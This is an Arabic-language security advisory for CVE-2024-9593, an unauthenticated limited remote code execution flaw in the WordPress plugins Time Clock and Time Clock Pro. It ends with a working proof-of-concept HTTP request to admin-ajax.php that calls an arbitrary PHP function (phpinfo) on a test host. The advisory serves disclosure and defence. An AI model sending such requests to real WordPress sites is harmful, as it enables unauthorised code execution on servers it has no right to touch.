
Time Clock <= 1.2.2 و Time Clock Pro <= 1.1.4 - غير مصادق (محدود) تنفيذ الأكواد عن بُعد
Time Clock <= 1.2.2 & Time Clock Pro <= 1.1.4 - تنفيذ تعليمات برمجية عن بُعد (محدود) بدون مصادقة
إضافة Time Clock وإضافة Time Clock Pro لووردبريس معرضتان لثغرة تنفيذ تعليمات برمجية عن بُعد في الإصدارات حتى 1.2.2 (لـ Time Clock) و1.1.4 (لـ Time Clock Pro) عبر الدالة 'etimeclockwp_load_function_callback'. وهذا يسمح للمهاجمين غير المصادق عليهم بتنفيذ كود على الخادم. لا يمكن تحديد معاملات الدالة المستدعاة.
تاريخ النشر: 2024-10-18 00:00:00
CVE: CVE-2024-9593
CVSS: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:L
درجة CVSS: 8.3
الأسماء المختصرة (Slugs): time-clock-pro, time-clock
POST /wp-admin/admin-ajax.php?action=etimeclockwp_load_function HTTP/2
Host: wpscan-vulnerability-test-bench.ddev.site
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.3
Content-Type: application/x-www-form-urlencoded
Content-Length: 16
function=phpinfo